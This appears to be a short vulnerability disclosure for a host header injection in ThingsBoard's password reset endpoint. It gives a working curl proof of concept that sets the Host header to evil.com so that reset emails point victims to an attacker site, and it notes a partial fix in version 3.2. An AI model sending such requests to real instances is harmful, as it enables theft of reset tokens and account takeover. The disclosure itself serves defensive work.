This vulnerability allows an attacker to inject host header which is used to generate password reset links among other things.
PoC:
curl 'https://thingsboard_host/api/noauth/resetPasswordByEmail' -H 'Host: evil.com' -H 'Connection: keep-alive' -H 'Accept: application/json, text/plain, */*' -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/json' -H 'Origin: https://thingsboard_host' -H 'Sec-Fetch-Site: same-origin' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Dest: empty' -H 'Referer: https://thingsboard_host/login/resetPasswordRequest' -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' --data-binary '{"email":"victim@example"}' --compressed
This will send an email to victim which points to https://evil.com instead of actual Thingsboard url. This allows an attacker to trick users into submitting their password reset tokens and new passwords to malicious websites linked from genuine Thingsboard mails.
It seems to have been patched in 3.2
where an option is provided to disable this behavior.
UI change: https://github.com/thingsboard/thingsboard/commit/6cc8eada320b9fb716da67f51939d3e94c024852
Default installation would still be vulnerable though.